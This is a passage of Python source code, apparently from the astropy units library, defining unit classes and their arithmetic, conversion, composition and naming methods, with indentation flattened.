useful as a dictionary key.
"""
unit = self.decompose()
r = zip([x.name for x in unit.bases], unit.powers)
# bases and powers are already sorted in a unique way
# r.sort()
r = tuple(r)
return r
@property
def names(self):
"""
Returns all of the names associated with this unit.
"""
raise AttributeError(
"Can not get names from unnamed units. "
"Perhaps you meant to_string()?")
@property
def name(self):
"""
Returns the canonical (short) name associated with this unit.
"""
raise AttributeError(
"Can not get names from unnamed units. "
"Perhaps you meant to_string()?")
@property
def aliases(self):
"""
Returns the alias (long) names for this unit.
"""
raise AttributeError(
"Can not get aliases from unnamed units. "
"Perhaps you meant to_string()?")
@property
def scale(self):
"""
Return the scale of the unit.
"""
return 1.0
@property
def bases(self):
"""
Return the bases of the unit.
"""
return [self]
@property
def powers(self):
"""
Return the powers of the unit.
"""
return [1]
def to_string(self, format=unit_format.Generic):
"""
Output the unit in the given format as a string.
Parameters
----------
format : `astropy.units.format.Base` instance or str
The name of a format or a formatter object. If not
provided, defaults to the generic format.
"""
f = unit_format.get_format(format)
return f.to_string(self)
def __format__(self, format_spec):
"""Try to format units using a formatter."""
try:
return self.to_string(format=format_spec)
except ValueError:
return format(six.text_type(self), format_spec)
@staticmethod
def _normalize_equivalencies(equivalencies):
"""
Normalizes equivalencies, ensuring each is a 4-tuple of the form::
(from_unit, to_unit, forward_func, backward_func)
Parameters
----------
equivalencies : list of equivalency pairs, or `None`
Returns
-------
A normalized list, including possible global defaults set by, e.g.,
`set_enabled_equivalencies`, except when `equivalencies`=`None`,
in which case the returned list is always empty.
Raises
------
ValueError if an equivalency cannot be interpreted
"""
normalized = _normalize_equivalencies(equivalencies)
if equivalencies is not None:
normalized += get_current_unit_registry().equivalencies
return normalized
def __pow__(self, p):
return CompositeUnit(1, [self], [p])
def __div__(self, m):
if isinstance(m, (bytes, six.text_type)):
m = Unit(m)
if isinstance(m, UnitBase):
if m.is_unity():
return self
return CompositeUnit(1, [self, m], [1, -1], _error_check=False)
try:
# Cannot handle this as Unit, re-try as Quantity
from .quantity import Quantity
return Quantity(1, self) / m
except TypeError:
return NotImplemented
def __rdiv__(self, m):
if isinstance(m, (bytes, six.text_type)):
return Unit(m) / self
try:
# Cannot handle this as Unit. Here, m cannot be a Quantity,
# so we make it into one, fasttracking when it does not have a
# unit, for the common case of <array> / <unit>.
from .quantity import Quantity
if hasattr(m, 'unit'):
result = Quantity(m)
result /= self
return result
else:
return Quantity(m, self**(-1))
except TypeError:
return NotImplemented
__truediv__ = __div__
__rtruediv__ = __rdiv__
def __mul__(self, m):
if isinstance(m, (bytes, six.text_type)):
m = Unit(m)
if isinstance(m, UnitBase):
if m.is_unity():
return self
elif self.is_unity():
return m
return CompositeUnit(1, [self, m], [1, 1], _error_check=False)
# Cannot handle this as Unit, re-try as Quantity.
try:
from .quantity import Quantity
return Quantity(1, self) * m
except TypeError:
return NotImplemented
def __rmul__(self, m):
if isinstance(m, (bytes, six.text_type)):
return Unit(m) * self
# Cannot handle this as Unit. Here, m cannot be a Quantity,
# so we make it into one, fasttracking when it does not have a unit
# for the common case of <array> * <unit>.
try:
from .quantity import Quantity
if hasattr(m, 'unit'):
result = Quantity(m)
result *= self
return result
else:
return Quantity(m, self)
except TypeError:
return NotImplemented
def __hash__(self):
# This must match the hash used in CompositeUnit for a unit
# with only one base and no scale or power.
return hash((str(self.scale), self.name, str('1')))
def __eq__(self, other):
if self is other:
return True
try:
other = Unit(other, parse_strict='silent')
except (ValueError, UnitsError, TypeError):
return False
# Other is Unit-like, but the test below requires it is a UnitBase
# instance; if it is not, give up (so that other can try).
if not isinstance(other, UnitBase):
return NotImplemented
try:
return is_effectively_unity(self._to(other))
except UnitsError:
return False
def __ne__(self, other):
return not (self == other)
def __le__(self, other):
scale = self._to(Unit(other))
return scale <= 1. or is_effectively_unity(scale)
def __ge__(self, other):
scale = self._to(Unit(other))
return scale >= 1. or is_effectively_unity(scale)
def __lt__(self, other):
return not (self >= other)
def __gt__(self, other):
return not (self <= other)
def __neg__(self):
return self * -1.
def is_equivalent(self, other, equivalencies=[]):
"""
Returns `True` if this unit is equivalent to ``other``.
Parameters
----------
other : unit object or string or tuple
The unit to convert to. If a tuple of units is specified, this
method returns true if the unit matches any of those in the tuple.
equivalencies : list of equivalence pairs, optional
A list of equivalence pairs to try if the units are not
directly convertible. See :ref:`unit_equivalencies`.
This list is in addition to possible global defaults set by, e.g.,
`set_enabled_equivalencies`.
Use `None` to turn off all equivalencies.
Returns
-------
bool
"""
equivalencies = self._normalize_equivalencies(equivalencies)
if isinstance(other, tuple):
return any(self.is_equivalent(u, equivalencies=equivalencies)
for u in other)
other = Unit(other, parse_strict='silent')
return self._is_equivalent(other, equivalencies)
def _is_equivalent(self, other, equivalencies=[]):
"""Returns `True` if this unit is equivalent to `other`.
See `is_equivalent`, except that a proper Unit object should be
given (i.e., no string) and that the equivalency list should be
normalized using `_normalize_equivalencies`.
"""
if isinstance(other, UnrecognizedUnit):
return False
if (self._get_physical_type_id() ==
other._get_physical_type_id()):
return True
elif len(equivalencies):
unit = self.decompose()
other = other.decompose()
for a, b, forward, backward in equivalencies:
if b is None:
# after canceling, is what's left convertible
# to dimensionless (according to the equivalency)?
try:
(other/unit).decompose([a])
return True
except Exception:
pass
else:
if(a._is_equivalent(unit) and b._is_equivalent(other) or
b._is_equivalent(unit) and a._is_equivalent(other)):
return True
return False
def _apply_equivalencies(self, unit, other, equivalencies):
"""
Internal function (used from `_get_converter`) to apply
equivalence pairs.
"""
def make_converter(scale1, func, scale2):
def convert(v):
return func(_condition_arg(v) / scale1) * scale2
return convert
for funit, tunit, a, b in equivalencies:
if tunit is None:
try:
ratio_in_funit = (other.decompose() /
unit.decompose()).decompose([funit])
return make_converter(ratio_in_funit.scale, a, 1.)
except UnitsError:
pass
else:
try:
scale1 = funit._to(unit)
scale2 = tunit._to(other)
return make_converter(scale1, a, scale2)
except UnitsError:
pass
try:
scale1 = tunit._to(unit)
scale2 = funit._to(other)
return make_converter(scale1, b, scale2)
except UnitsError:
pass
def get_err_str(unit):
unit_str = unit.to_string('unscaled')
physical_type = unit.physical_type
if physical_type != 'unknown':
unit_str = "'{0}' ({1})".format(
unit_str, physical_type)
else:
unit_str = "'{0}'".format(unit_str)
return unit_str
unit_str = get_err_str(unit)
other_str = get_err_str(other)
raise UnitConversionError(
"{0} and {1} are not convertible".format(
unit_str, other_str))
def _get_converter(self, other, equivalencies=[]):
other = Unit(other)
# First see if it is just a scaling.
try:
scale = self._to(other)
except UnitsError:
pass
else:
return lambda val: scale * _condition_arg(val)
# if that doesn't work, maybe we can do it with equivalencies?
try:
return self._apply_equivalencies(
self, other, self._normalize_equivalencies(equivalencies))
except UnitsError as exc:
# Last hope: maybe other knows how to do it?
# We assume the equivalencies have the unit itself as first item.
# TODO: maybe better for other to have a `_back_converter` method?
if hasattr(other, 'equivalencies'):
for funit, tunit, a, b in other.equivalencies:
if other is funit:
try:
return lambda v: b(self._get_converter(
tunit, equivalencies=equivalencies)(v))
except Exception:
pass
raise exc
def _to(self, other):
"""
Returns the scale to the specified unit.
See `to`, except that a Unit object should be given (i.e., no
string), and that all defaults are used, i.e., no
equivalencies and value=1.
"""
# There are many cases where we just want to ensure a Quantity is
# of a particular unit, without checking whether it's already in
# a particular unit. If we're being asked to convert from a unit
# to itself, we can short-circuit all of this.
if self is other:
return 1.0
# Don't presume decomposition is possible; e.g.,
# conversion to function units is through equivalencies.
if isinstance(other, UnitBase):
self_decomposed = self.decompose()
other_decomposed = other.decompose()
# Check quickly whether equivalent. This is faster than
# `is_equivalent`, because it doesn't generate the entire
# physical type list of both units. In other words it "fails
# fast".
if(self_decomposed.powers == other_decomposed.powers and
all(self_base is other_base for (self_base, other_base)
in zip(self_decomposed.bases, other_decomposed.bases))):
return self_decomposed.scale / other_decomposed.scale
raise UnitConversionError(
"'{0!r}' is not a scaled version of '{1!r}'".format(self, other))
def to(self, other, value=1.0, equivalencies=[]):
"""
Return the converted values in the specified unit.
Parameters
----------
other : unit object or string
The unit to convert to.
value : scalar int or float, or sequence convertible to array, optional
Value(s) in the current unit to be converted to the
specified unit. If not provided, defaults to 1.0
equivalencies : list of equivalence pairs, optional
A list of equivalence pairs to try if the units are not
directly convertible. See :ref:`unit_equivalencies`.
This list is in addition to possible global defaults set by, e.g.,
`set_enabled_equivalencies`.
Use `None` to turn off all equivalencies.
Returns
-------
values : scalar or array
Converted value(s). Input value sequences are returned as
numpy arrays.
Raises
------
UnitsError
If units are inconsistent
"""
return self._get_converter(other, equivalencies=equivalencies)(value)
def in_units(self, other, value=1.0, equivalencies=[]):
"""
Alias for `to` for backward compatibility with pynbody.
"""
return self.to(
other, value=value, equivalencies=equivalencies)
def decompose(self, bases=set()):
"""
Return a unit object composed of only irreducible units.
Parameters
----------
bases : sequence of UnitBase, optional
The bases to decompose into. When not provided,
decomposes down to any irreducible units. When provided,
the decomposed result will only contain the given units.
This will raises a `UnitsError` if it's not possible
to do so.
Returns
-------
unit : CompositeUnit object
New object containing only irreducible unit objects.
"""
raise NotImplementedError()
def _compose(self, equivalencies=[], namespace=[], max_depth=2, depth=0,
cached_results=None):
def is_final_result(unit):
# Returns True if this result contains only the expected
# units
for base in unit.bases:
if base not in namespace:
return False
return True
unit = self.decompose()
key = hash(unit)
cached = cached_results.get(key)
if cached is not None:
if isinstance(cached, Exception):
raise cached
return cached
# Prevent too many levels of recursion
# And special case for dimensionless unit
if depth >= max_depth:
cached_results[key] = [unit]
return [unit]
# Make a list including all of the equivalent units
units = [unit]
for funit, tunit, a, b in equivalencies:
if tunit is not None:
if self._is_equivalent(funit):
scale = funit.decompose().scale / unit.scale
units.append(Unit(a(1.0 / scale) * tunit).decompose())
elif self._is_equivalent(tunit):
scale = tunit.decompose().scale / unit.scale
units.append(Unit(b(1.0 / scale) * funit).decompose())
else:
if self._is_equivalent(funit):
units.append(Unit(unit.scale))
# Store partial results
partial_results = []
# Store final results that reduce to a single unit or pair of
# units
if len(unit.bases) == 0:
final_results = [set([unit]), set()]
else:
final_results = [set(), set()]
for tunit in namespace:
tunit_decomposed = tunit.decompose()
for u in units:
# If the unit is a base unit, look for an exact match
# to one of the bases of the target unit. If found,
# factor by the same power as the target unit's base.
# This allows us to factor out fractional powers
# without needing to do an exhaustive search.
if len(tunit_decomposed.bases) == 1:
for base, power in zip(u.bases, u.powers):
if tunit_decomposed._is_equivalent(base):
tunit = tunit ** power
tunit_decomposed = tunit_decomposed ** power
break
composed = (u / tunit_decomposed).decompose()
factored = composed * tunit
len_bases = len(composed.bases)
if is_final_result(factored) and len_bases <= 1:
final_results[len_bases].add(factored)
else:
partial_results.append(
(len_bases, composed, tunit))
# Do we have any minimal results?
for final_result in final_results:
if len(final_result):
results = final_results[0].union(final_results[1])
cached_results[key] = results
return results
partial_results.sort(key=operator.itemgetter(0))
# ...we have to recurse and try to further compose
results = []
for len_bases, composed, tunit in partial_results:
try:
composed_list = composed._compose(
equivalencies=equivalencies,
namespace=namespace,
max_depth=max_depth, depth=depth + 1,
cached_results=cached_results)
except UnitsError:
composed_list = []
for subcomposed in composed_list:
results.append(
(len(subcomposed.bases), subcomposed, tunit))
if len(results):
results.sort(key=operator.itemgetter(0))
min_length = results[0][0]
subresults = set()
for len_bases, composed, tunit in results:
if len_bases > min_length:
break
else:
factored = composed * tunit
if is_final_result(factored):
subresults.add(factored)
if len(subresults):
cached_results[key] = subresults
return subresults
if not is_final_result(self):
result = UnitsError(
"Cannot represent unit {0} in terms of the given "
"units".format(self))
cached_results[key] = result
raise result
cached_results[key] = [self]
return [self]
def compose(self, equivalencies=[], units=None, max_depth=2,
include_prefix_units=False):
"""
Return the simplest possible composite unit(s) that represent
the given unit. Since there may be multiple equally simple
compositions of the unit, a list of units is always returned.
Parameters
----------
equivalencies : list of equivalence pairs, optional
A list of equivalence pairs to also list. See
:ref:`unit_equivalencies`.
This list is in addition to possible global defaults set by, e.g.,
`set_enabled_equivalencies`.
Use `None` to turn off all equivalencies.
units : set of units to compose to, optional
If not provided, any known units may be used to compose
into. Otherwise, ``units`` is a dict, module or sequence
containing the units to compose into.
max_depth : int, optional
The maximum recursion depth to use when composing into
composite units.
include_prefix_units : bool, optional
When `True`, include prefixed units in the result.
Default is `False`.
Returns
-------
units : list of `CompositeUnit`
A list of candidate compositions. These will all be
equally simple, but it may not be possible to
automatically determine which of the candidates are
better.
"""
# Pre-normalize the equivalencies list
equivalencies = self._normalize_equivalencies(equivalencies)
# The namespace of units to compose into should be filtered to
# only include units with bases in common with self, otherwise
# they can't possibly provide useful results. Having too many
# destination units greatly increases the search space.
def has_bases_in_common(a, b):
if len(a.bases) == 0 and len(b.bases) == 0:
return True
for ab in a.bases:
for bb in b.bases:
if ab == bb:
return True
return False
def has_bases_in_common_with_equiv(unit, other):
if has_bases_in_common(unit, other):
return True
for funit, tunit, a, b in equivalencies:
if tunit is not None:
if unit._is_equivalent(funit):
if has_bases_in_common(tunit.decompose(), other):
return True
elif unit._is_equivalent(tunit):
if has_bases_in_common(funit.decompose(), other):
return True
else:
if unit._is_equivalent(funit):
if has_bases_in_common(dimensionless_unscaled, other):
return True
return False
def filter_units(units):
filtered_namespace = set()
for tunit in units:
if (isinstance(tunit, UnitBase) and
(include_prefix_units or
not isinstance(tunit, PrefixUnit)) and
has_bases_in_common_with_equiv(
decomposed, tunit.decompose())):
filtered_namespace.add(tunit)
return filtered_namespace
decomposed = self.decompose()
if units is None:
units = filter_units(self._get_units_with_same_physical_type(
equivalencies=equivalencies))
if len(units) == 0:
units = get_current_unit_registry().non_prefix_units
elif isinstance(units, dict):
units = set(filter_units(six.itervalues(units)))
elif inspect.ismodule(units):
units = filter_units(six.itervalues(vars(units)))
else:
units = filter_units(_flatten_units_collection(units))
def sort_results(results):
if not len(results):
return []
# Sort the results so the simplest ones appear first.
# Simplest is defined as "the minimum sum of absolute
# powers" (i.e. the fewest bases), and preference should
# be given to results where the sum of powers is positive
# and the scale is exactly equal to 1.0
results = list(results)
results.sort(key=lambda x: np.abs(x.scale))
results.sort(key=lambda x: np.sum(np.abs(x.powers)))
results.sort(key=lambda x: np.sum(x.powers) < 0.0)
results.sort(key=lambda x: not is_effectively_unity(x.scale))
last_result = results[0]
filtered = [last_result]
for result in results[1:]:
if str(result) != str(last_result):
filtered.append(result)
last_result = result
return filtered
return sort_results(self._compose(
equivalencies=equivalencies, namespace=units,
max_depth=max_depth, depth=0, cached_results={}))
def to_system(self, system):
"""
Converts this unit into ones belonging to the given system.
Since more than one result may be possible, a list is always
returned.
Parameters
----------
system : module
The module that defines the unit system. Commonly used
ones include `astropy.units.si` and `astropy.units.cgs`.
To use your own module it must contain unit objects and a
sequence member named ``bases`` containing the base units of
the system.
Returns
-------
units : list of `CompositeUnit`
The list is ranked so that units containing only the base
units of that system will appear first.
"""
bases = set(system.bases)
def score(compose):
# In case that compose._bases has no elements we return
# 'np.inf' as 'score value'. It does not really matter which
# number we would return. This case occurs for instance for
# dimensionless quantities:
compose_bases = compose.bases
if len(compose_bases) == 0:
return np.inf
else:
sum = 0
for base in compose_bases:
if base in bases:
sum += 1
return sum / float(len(compose_bases))
x = self.decompose(bases=bases)
composed = x.compose(units=system)
composed = sorted(composed, key=score, reverse=True)
return composed
@lazyproperty
def si(self):
"""
Returns a copy of the current `Unit` instance in SI units.
"""
from . import si
return self.to_system(si)[0]
@lazyproperty
def cgs(self):
"""
Returns a copy of the current `Unit` instance with CGS units.
"""
from . import cgs
return self.to_system(cgs)[0]
@property
def physical_type(self):
"""
Return the physical type on the unit.
Examples
--------
>>> from astropy import units as u
>>> print(u.m.physical_type)
length
"""
from . import physical
return physical.get_physical_type(self)
def _get_units_with_same_physical_type(self, equivalencies=[]):
"""
Return a list of registered units with the same physical type
as this unit.
This function is used by Quantity to add its built-in
conversions to equivalent units.
This is a private method, since end users should be encouraged
to use the more powerful `compose` and `find_equivalent_units`
methods (which use this under the hood).
Parameters
----------
equivalencies : list of equivalence pairs, optional
A list of equivalence pairs to also pull options from.
See :ref:`unit_equivalencies`. It must already be
normalized using `_normalize_equivalencies`.
"""
unit_registry = get_current_unit_registry()
units = set(unit_registry.get_units_with_physical_type(self))
for funit, tunit, a, b in equivalencies:
if tunit is not None:
if self.is_equivalent(funit) and tunit not in units:
units.update(
unit_registry.get_units_with_physical_type(tunit))
if self._is_equivalent(tunit) and funit not in units:
units.update(
unit_registry.get_units_with_physical_type(funit))
else:
if self.is_equivalent(funit):
units.add(dimensionless_unscaled)
return units
class EquivalentUnitsList(list):
"""
A class to handle pretty-printing the result of
`find_equivalent_units`.
"""
def __repr__(self):
if len(self) == 0:
return "[]"
else:
lines = []
for u in self:
irred = u.decompose().to_string()
if irred == u.name:
irred = "irreducible"
lines.append((u.name, irred, ', '.join(u.aliases)))
lines.sort()
lines.insert(0, ('Primary name', 'Unit definition', 'Aliases'))
widths = [0, 0, 0]
for line in lines:
for i, col in enumerate(line):
widths[i] = max(widths[i], len(col))
f = " {{0:<{0}s}} | {{1:<{1}s}} | {{2:<{2}s}}".format(*widths)
lines = [f.format(*line) for line in lines]
lines = (lines[0:1] +
['['] +
['{0} ,'.format(x) for x in lines[1:]] +
[']'])
return '\n'.join(lines)
def find_equivalent_units(self, equivalencies=[], units=None,
include_prefix_units=False):
"""
Return a list of all the units that are the same type as ``self``.
Parameters
----------
equivalencies : list of equivalence pairs, optional
A list of equivalence pairs to also list. See
:ref:`unit_equivalencies`.
Any list given, including an empty one, supercedes global defaults
that may be in effect (as set by `set_enabled_equivalencies`)
units : set of units to search in, optional
If not provided, all defined units will be searched for
equivalencies. Otherwise, may be a dict, module or
sequence containing the units to search for equivalencies.
include_prefix_units : bool, optional
When `True`, include prefixed units in the result.
Default is `False`.
Returns
-------
units : list of `UnitBase`
A list of unit objects that match ``u``. A subclass of
`list` (``EquivalentUnitsList``) is returned that
pretty-prints the list of units when output.
"""
results = self.compose(
equivalencies=equivalencies, units=units, max_depth=1,
include_prefix_units=include_prefix_units)
results = set(
x.bases[0] for x in results if len(x.bases) == 1)
return self.EquivalentUnitsList(results)
def is_unity(self):
"""
Returns `True` if the unit is unscaled and dimensionless.
"""
return False
class NamedUnit(UnitBase):
"""
The base class of units that have a name.
Parameters
----------
st : str, list of str, 2-tuple
The name of the unit. If a list of strings, the first element
is the canonical (short) name, and the rest of the elements
are aliases. If a tuple of lists, the first element is a list
of short names, and the second element is a list of long
names; all but the first short name are considered "aliases".
Each name *should* be a valid Python identifier to make it
easy to access, but this is not required.
namespace : dict, optional
When provided, inject the unit, and all of its aliases, in the
given namespace dictionary. If a unit by the same name is
already in the namespace, a ValueError is raised.
doc : str, optional
A docstring describing the unit.
format : dict, optional
A mapping to format-specific representations of this unit.
For example, for the ``Ohm`` unit, it might be nice to have it
displayed as ``\\Omega`` by the ``latex`` formatter. In that
case, `format` argument should be set to::
{'latex': r'\\Omega'}
Raises
------
ValueError
If any of the given unit names are already in the registry.
ValueError
If any of the given unit names are not valid Python tokens.
"""
def __init__(self, st, doc=None, format=None, namespace=None):
UnitBase.__init__(self)
if isinstance(st, (bytes, six.text_type)):
self._names = [st]
self._short_names = [st]
self._long_names = []
elif isinstance(st, tuple):
if not len(st) == 2:
raise ValueError("st must be string, list or 2-tuple")
self._names = st[0] + [n for n in st[1] if n not in st[0]]
if not len(self._names):
raise ValueError("must provide at least one name")
self._short_names = st[0][:]
self._long_names = st[1][:]
else:
if len(st) == 0:
raise ValueError(
"st list must have at least one entry")
self._names = st[:]
self._short_names = [st[0]]
self._long_names = st[1:]
if format is None:
format = {}
self._format = format
if doc is None:
doc = self._generate_doc()
else:
doc = textwrap.dedent(doc)
doc = textwrap.fill(doc)
self.__doc__ = doc
self._inject(namespace)
def _generate_doc(self):
"""
Generate a docstring for the unit if the user didn't supply
one. This is only used from the constructor and may be
overridden in subclasses.
"""
names = self.names
if len(self.names) > 1:
return "{1} ({0})".format(*names[:2])
else:
return names[0]
def get_format_name(self, format):
"""
Get a name for this unit that is specific to a particular
format.
Uses the dictionary passed into the `format` kwarg in the
constructor.
Parameters
----------
format : str
The name of the format
Returns
-------
name : str
The name of the unit for the given format.
"""
return self._format.get(format, self.name)
@property
def names(self):
"""
Returns all of the names associated with this unit.
"""
return self._names
@property
def name(self):
"""
Returns the canonical (short) name associated with this unit.
"""
return self._names[0]
@property
def aliases(self):
"""
Returns the alias (long) names for this unit.
"""
return self._names[1:]
@property
def short_names(self):
"""
Returns all of the short names associated with this unit.
"""
return self._short_names
@property
def long_names(self):
"""
Returns all of the long names associated with this unit.
"""
return self._long_names
def _inject(self, namespace=None):
"""
Injects the unit, and all of its aliases, in the given
namespace dictionary.
"""
if namespace is None:
return
# Loop through all of the names first, to ensure all of them
# are new, then add them all as a single "transaction" below.
for name in self._names:
if name in namespace and self != namespace[name]:
raise ValueError(
"Object with name {0!r} already exists in "
"given namespace ({1!r}).".format(
name, namespace[name]))
for name in self._names:
namespace[name] = self
def _recreate_irreducible_unit(cls, names, registered):
"""
This is used to reconstruct units when passed around by
multiprocessing.
"""
registry = get_current_unit_registry().registry
if names[0] in registry:
# If in local registry return that object.
return registry[names[0]]
else:
# otherwise, recreate the unit.
unit = cls(names)
if registered:
# If not in local registry but registered in origin registry,
# enable unit in local registry.
get_current_unit_registry().add_enabled_units([unit])
return unit
class IrreducibleUnit(NamedUnit):
"""
Irreducible units are the units that all other units are defined
in terms of.
Examples are meters, seconds, kilograms, amperes, etc. There is
only once instance of such a unit per type.
"""
def __reduce__(self):
# When IrreducibleUnit objects are passed to other processes
# over multiprocessing, they need to be recreated to be the
# ones already in the subprocesses' namespace, not new
# objects, or they will be considered "unconvertible".
# Therefore, we have a custom pickler/unpickler that
# understands how to recreate the Unit on the other side.
registry = get_current_unit_registry().registry
return (_recreate_irreducible_unit,
(self.__class__, list(self.names), self.name in registry),
self.__dict__)
@property
def represents(self):
"""The unit that this named unit represents.
For an irreducible unit, that is always itself.
"""
return self
def decompose(self, bases=set()):
if len(bases) and self not in bases:
for base in bases:
try:
scale = self._to(base)
except UnitsError:
pass
else:
if is_effectively_unity(scale):
return base
else:
return CompositeUnit(scale, [base], [1],
_error_check=False)
raise UnitConversionError(
"Unit {0} can not be decomposed into the requested "
"bases".format(self))
return self
class UnrecognizedUnit(IrreducibleUnit):
"""
A unit that did not parse correctly. This allows for
roundtripping it as a string, but no unit operations actually work
on it.
Parameters
----------
st : str
The name of the unit.
"""
# For UnrecognizedUnits, we want to use "standard" Python
# pickling, not the special case that is used for
# IrreducibleUnits.
__reduce__ = object.__reduce__
def __repr__(self):
return "UnrecognizedUnit({0})".format(str(self))
def __bytes__(self):
return self.name.encode('ascii', 'replace')
if six.PY2:
__str__ = __bytes__
def __unicode__(self):
return self.name
if not six.PY2:
__str__ = __unicode__
def to_string(self, format=None):
return self.name
def _unrecognized_operator(self, *args, **kwargs):
raise ValueError(
"The unit {0!r} is unrecognized, so all arithmetic operations "
"with it are invalid.".format(self.name))
__pow__ = __div__ = __rdiv__ = __truediv__ = __rtruediv__ = __mul__ = \
__rmul__ = __lt__ = __gt__ = __le__ = __ge__ = __neg__ = \
_unrecognized_operator
def __eq__(self, other):
other = Unit(other, parse_strict='silent')
return isinstance(other, UnrecognizedUnit) and self.name == other.name
def __ne__(self, other):
return not (self == other)
def is_equivalent(self, other, equivalencies=None):
self._normalize_equivalencies(equivalencies)
return self == other
def _get_converter(self, other, equivalencies=None):
self._normalize_equivalencies(equivalencies)
raise ValueError(
"The unit {0!r} is unrecognized. It can not be converted "
"to other units.".format(self.name))
def get_format_name(self, format):
return self.name
def is_unity(self):
return False
class _UnitMetaClass(InheritDocstrings):
"""
This metaclass exists because the Unit constructor should
sometimes return instances that already exist. This "overrides"
the constructor before the new instance is actually created, so we
can return an existing one.
"""
def __call__(self, s, represents=None, format=None, namespace=None,
doc=None, parse_strict='raise'):
# Short-circuit if we're already a unit
if hasattr(s, '_get_physical_type_id'):
return s
# turn possible Quantity input for s or represents into a Unit
from .quantity import Quantity
if isinstance(represents, Quantity):
if is_effectively_unity(represents.value):
represents = represents.unit
else:
# cannot use _error_check=False: scale may be effectively unity
represents = CompositeUnit(represents.value *
represents.unit.scale,
bases=represents.unit.bases,
powers=represents.unit.powers)
if isinstance(s, Quantity):
if is_effectively_unity(s.value):
s = s.unit
else:
s = CompositeUnit(s.value * s.unit.scale,
bases=s.unit.bases,
powers=s.unit.powers)
# now decide what we really need to do; define derived Unit?
if isinstance(represents, UnitBase):
# This has the effect of calling the real __new__ and
# __init__ on the Unit class.
return super(_UnitMetaClass, self).__call__(
s, represents, format=format, namespace=namespace, doc=doc)
# or interpret a Quantity (now became unit), string or number?
if isinstance(s, UnitBase):
return s
elif isinstance(s, (bytes, six.text_type)):
if len(s.strip()) == 0:
# Return the NULL unit
return dimensionless_unscaled
if format is None:
format = unit_format.Generic
f = unit_format.get_format(format)
if not six.PY2 and isinstance(s, bytes):
s = s.decode('ascii')
try:
return f.parse(s)
except Exception as e:
if parse_strict == 'silent':
pass
else:
# Deliberately not issubclass here. Subclasses
# should use their name.
if f is not unit_format.Generic:
format_clause = f.name + ' '
else:
format_clause = ''
msg = ("'{0}' did not parse as {1}unit: {2}"
.format(s, format_clause, six.text_type(e)))
if parse_strict == 'raise':
raise ValueError(msg)
elif parse_strict == 'warn':
warnings.warn(msg, UnitsWarning)
else:
raise ValueError("'parse_strict' must be 'warn', "
"'raise' or 'silent'")
return UnrecognizedUnit(s)
elif isinstance(s, (int, float, np.floating, np.integer)):
return CompositeUnit(s, [], [])
elif s is None:
raise TypeError("None is not a valid Unit")
else:
raise TypeError("{0} can not be converted to a Unit".format(s))
@six.add_metaclass(_UnitMetaClass)
class Unit(NamedUnit):
"""
The main unit class.
There are a number of different ways to construct a Unit, but
always returns a `UnitBase` instance. If the arguments refer to
an already-existing unit, that existing unit instance is returned,
rather than a new one.
- From a string::
Unit(s, format=None, parse_strict='silent')
Construct from a string representing a (possibly compound) unit.
The optional `format` keyword argument specifies the format the
string is in, by default ``"generic"``. For a description of
the available formats, see `astropy.units.format`.
The optional ``parse_strict`` keyword controls what happens when an
unrecognized unit string is passed in. It may be one of the following:
- ``'raise'``: (default) raise a ValueError exception.
- ``'warn'``: emit a Warning, and return an
`UnrecognizedUnit` instance.
- ``'silent'``: return an `UnrecognizedUnit` instance.
- From a number::
Unit(number)
Creates a dimensionless unit.
- From a `UnitBase` instance::
Unit(unit)
Returns the given unit unchanged.
- From `None`::
Unit()
Returns the null unit.
- The last form, which creates a new `Unit` is described in detail
below.
Parameters
----------
st : str or list of str
The name of the unit. If a list, the first element is the
canonical (short) name, and the rest of the elements are
aliases.
represents : UnitBase instance
The unit that this named unit represents.
doc : str, optional
A docstring describing the unit.
format : dict, optional
A mapping to format-specific representations of this unit.
For example, for the ``Ohm`` unit, it might be nice to have it
displayed as ``\\Omega`` by the ``latex`` formatter. In that
case, `format` argument should be set to::
{'latex': r'\\Omega'}
namespace : dictionary, optional
When provided, inject the unit (and all of its aliases) into
the given namespace.
Raises
------
ValueError
If any of the given unit names are already in the registry.
ValueError
If any of the given unit names are not valid Python tokens.
"""
def __init__(self, st, represents=None, doc=None,
format=None, namespace=None):
represents = Unit(represents)
self._represents = represents
NamedUnit.__init__(self, st, namespace=namespace, doc=doc,
format=format)
@property
def represents(self):
"""The unit that this named unit represents."""
return self._represents
def decompose(self, bases=set()):
return self._represents.decompose(bases=bases)
def is_unity(self):
return self._represents.is_unity()
def __hash__(self):
return hash(self.name) + hash(self._represents)
@classmethod
def _from_physical_type_id(cls, physical_type_id):
# get string bases and powers from the ID tuple
bases = [cls(base) for base, _ in physical_type_id]
powers = [power for _, power in physical_type_id]
if len(physical_type_id) == 1 and powers[0] == 1:
unit = bases[0]
else:
unit = CompositeUnit(1, bases, powers)
return unit
class PrefixUnit(Unit):
"""
A unit that is simply a SI-prefixed version of another unit.
For example, ``mm`` is a `PrefixUnit` of ``.001 * m``.
The constructor is the same as for `Unit`.
"""
class CompositeUnit(UnitBase):
"""
Create a composite unit using expressions of previously defined
units.
Direct use of this class is not recommended. Instead use the
factory function `Unit` and arithmetic operators to compose
units.
Parameters
----------
scale : number
A scaling factor for the unit.
bases : sequence of `UnitBase`
A sequence of units this unit is composed of.
powers : sequence of numbers
A sequence of powers (in parallel with ``bases``) for each
of the base units.
"""
def __init__(self, scale, bases, powers, decompose=False,
decompose_bases=set(), _error_check=True):
# There are many cases internal to astropy.units where we
# already know that all the bases are Unit objects, and the
# powers have been validated. In those cases, we can skip the
# error checking for performance reasons. When the private
# kwarg `_error_check` is False, the error checking is turned
# off.
if _error_check:
scale = sanitize_scale(scale)
for base in bases:
if not isinstance(base, UnitBase):
raise TypeError(
"bases must be sequence of UnitBase instances")
powers = [validate_power(p) for p in powers]
self._scale = scale
self._bases = bases
self._powers = powers
self._decomposed_cache = None
self._expand_and_gather(decompose=decompose, bases=decompose_bases)
self._hash = None
def __repr__(self):
if len(self._bases):
return super(CompositeUnit, self).__repr__()
else:
if self._scale != 1.0:
return 'Unit(dimensionless with a scale of {0})'.format(
self._scale)
else:
return 'Unit(dimensionless)'
def __hash__(self):
if self._hash is None:
parts = ([str(self._scale)] +
[x.name for x in self._bases] +
[str(x) for x in self._powers])
self._hash = hash(tuple(parts))
return self._hash
@property
def scale(self):
"""
Return the scale of the composite unit.
"""
return self._scale
@property
def bases(self):
"""
Return the bases of the composite unit.
"""
return self._bases
@property
def powers(self):
"""
Return the powers of the composite unit.
"""
return self._powers
def _expand_and_gather(self, decompose=False, bases=set()):
def add_unit(unit, power, scale):
if unit not in bases:
for base in bases:
try:
scale *= unit._to(base) ** power
except UnitsError:
pass
except ValueError:
# on python2, sqrt(negative number) does not
# automatically lead to a complex number, but this is
